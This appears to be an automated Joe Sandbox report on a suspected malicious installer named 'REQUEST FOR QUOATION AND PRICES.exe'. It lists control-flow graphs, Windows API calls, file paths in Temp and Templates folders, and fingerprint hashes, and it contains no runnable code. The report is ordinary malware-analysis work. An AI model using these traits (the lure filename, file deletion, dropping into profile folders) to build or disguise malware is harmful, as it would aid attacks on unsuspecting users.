                                                                                                                                control_flow_graph 483 405f0c-405f17 484 405f19-405f28 483->484 485 405f2a-405f40 483->485 484->485 486 405f46-405f53 485->486 487 406158-40615e 485->487 486->487 488 405f59-405f60 486->488 489 406164-40616f 487->489 490 405f65-405f72 487->490 488->487 492 406171-406175 call 405eea 489->492 493 40617a-40617b 489->493 490->489 491 405f78-405f84 490->491 494 406145 491->494 495 405f8a-405fc6 491->495 492->493 497 406153-406156 494->497 498 406147-406151 494->498 499 4060e6-4060ea 495->499 500 405fcc-405fd7 GetVersion 495->500 497->487 498->487 503 4060ec-4060f0 499->503 504 40611f-406123 499->504 501 405ff1 500->501 502 405fd9-405fdd 500->502 505 405ff8-405fff 501->505 502->501 508 405fdf-405fe3 502->508 509 406100-40610d call 405eea 503->509 510 4060f2-4060fe call 405e31 503->510 506 406132-406143 lstrlenW 504->506 507 406125-40612d call 405f0c 504->507 511 406001-406003 505->511 512 406004-406006 505->512 506->487 507->506 508->501 515 405fe5-405fe9 508->515 520 406112-40611b 509->520 510->520 511->512 518 406042-406045 512->518 519 406008-40602e call 405db7 512->519 515->501 521 405feb-405fef 515->521 524 406055-406058 518->524 525 406047-406053 GetSystemDirectoryW 518->525 531 406034-40603d call 405f0c 519->531 532 4060cd-4060d1 519->532 520->506 523 40611d 520->523 521->505 527 4060de-4060e4 call 40617e 523->527 529 4060c3-4060c5 524->529 530 40605a-406068 GetWindowsDirectoryW 524->530 528 4060c7-4060cb 525->528 527->506 528->527 528->532 529->528 533 40606a-406074 529->533 530->529 531->528 532->527 536 4060d3-4060d9 lstrcatW 532->536 538 406076-406079 533->538 539 40608e-4060a4 SHGetSpecialFolderLocation 533->539 536->527 538->539 543 40607b-406082 538->543 540 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 539->540 541 4060bf 539->541 540->528 540->541 541->529 544 40608a-40608c 543->544 544->528 544->539
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 900638850-1230650788
                                                                                                                                • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 545 405772-405798 call 405a3d 548 4057b1-4057b8 545->548 549 40579a-4057ac DeleteFileW 545->549 551 4057ba-4057bc 548->551 552 4057cb-4057db call 405eea 548->552 550 40592e-405932 549->550 553 4057c2-4057c5 551->553 554 4058dc-4058e1 551->554 558 4057ea-4057eb call 405981 552->558 559 4057dd-4057e8 lstrcatW 552->559 553->552 553->554 554->550 557 4058e3-4058e6 554->557 560 4058f0-4058f8 call 40622d 557->560 561 4058e8-4058ee 557->561 563 4057f0-4057f4 558->563 559->563 560->550 569 4058fa-40590e call 405935 call 40572a 560->569 561->550 566 405800-405806 lstrcatW 563->566 567 4057f6-4057fe 563->567 568 40580b-405827 lstrlenW FindFirstFileW 566->568 567->566 567->568 570 4058d1-4058d5 568->570 571 40582d-405835 568->571 585 405910-405913 569->585 586 405926-405929 call 405194 569->586 570->554 576 4058d7 570->576 573 405855-405869 call 405eea 571->573 574 405837-40583f 571->574 587 405880-40588b call 40572a 573->587 588 40586b-405873 573->588 577 405841-405849 574->577 578 4058b4-4058c4 FindNextFileW 574->578 576->554 577->573 581 40584b-405853 577->581 578->571 584 4058ca-4058cb FindClose 578->584 581->573 581->578 584->570 585->561 589 405915-405924 call 405194 call 405d84 585->589 586->550 598 4058ac-4058af call 405194 587->598 599 40588d-405890 587->599 588->578 590 405875-40587e call 405772 588->590 589->550 590->578 598->578 600 405892-4058a2 call 405194 call 405d84 599->600 601 4058a4-4058aa 599->601 600->578 601->578
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 0040579B
                                                                                                                                • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 004057E3
                                                                                                                                • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 00405806
                                                                                                                                • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 0040580C
                                                                                                                                • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 0040581C
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                Strings
                                                                                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405780
                                                                                                                                • \*.*, xrefs: 004057DD
                                                                                                                                • "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe", xrefs: 0040577B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                                                • API String ID: 2035342205-3361064684
                                                                                                                                • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,771B2EE0,00405792,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406238
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID: WB
                                                                                                                                • API String ID: 2295610775-2854515933
                                                                                                                                • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                                • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 310444273-0
                                                                                                                                • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                                                • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet, xrefs: 004020FB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet
                                                                                                                                • API String ID: 542301482-632512459
                                                                                                                                • Opcode ID: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                                                • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                                                • Opcode Fuzzy Hash: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                                                • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 247 403919-40392a call 405db7 241->247 248 40392f-403935 lstrcatW 241->248 251 40393a-403963 call 403b8a call 405a3d 242->251 247->248 248->251 256 4039f5-4039fd call 405a3d 251->256 257 403969-40396e 251->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 258 403974-40399c call 405db7 257->258 258->256 265 40399e-4039a2 258->265 267 403ab1-403ab9 call 40140b 263->267 268 403a32-403a62 RegisterClassW 263->268 264->263 269 4039b4-4039c0 lstrlenW 265->269 270 4039a4-4039b1 call 405962 265->270 281 403ac3-403ace call 403b8a 267->281 282 403abb-403abe 267->282 271 403b80 268->271 272 403a68-403aac SystemParametersInfoW CreateWindowExW 268->272 276 4039c2-4039d0 lstrcmpiW 269->276 277 4039e8-4039f0 call 405935 call 405eea 269->277 270->269 274 403b82-403b89 271->274 272->267 276->277 280 4039d2-4039dc GetFileAttributesW 276->280 277->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->274 284->277 285->277 285->284 293 403af3-403af8 LoadLibraryW 291->293 294 403afa-403b0c GetClassInfoW 291->294 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 293->294 296 403b24-403b47 DialogBoxParamW call 40140b 294->296 297 403b0e-403b1e GetClassInfoW RegisterClassW 294->297 303 403b4c-403b55 call 403804 296->303 297->296 300->282 304 403b6d-403b74 call 40140b 300->304 301->271 303->274 304->282
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                  • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 00403935
                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 004039B5
                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet), ref: 00403A1C
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 914957316-1878157874
                                                                                                                                • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 323 403cb6-403cbc 316->323 324 403c9e-403cb0 ShowWindow 316->324 328 403e67-403e82 318->328 320 403e24-403e2f call 401389 319->320 321 403e55-403e57 319->321 320->321 342 403e31-403e50 SendMessageW 320->342 321->318 327 4040fc 321->327 329 403cd8-403cdb 323->329 330 403cbe-403cd3 DestroyWindow 323->330 324->323 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 345 403e97-403ea2 334->345 346 4040ba-4040d3 DestroyWindow EndDialog 334->346 336->327 343 4040e1-4040e7 336->343 338->335 340 403d97-403da5 call 404196 339->340 341 403cfa-403d0b GetDlgItem 339->341 340->335 347 403d2a-403d2d 341->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 341->348 342->335 343->327 350 4040e9-4040f2 ShowWindow 343->350 345->346 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 345->351 346->336 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->340 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->340 361->356 366 403d52-403d58 call 40140b 362->366 367 403d67-403d70 call 40140b 362->367 377 403d5e 366->377 367->340 376 403d72-403d7c 367->376 376->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 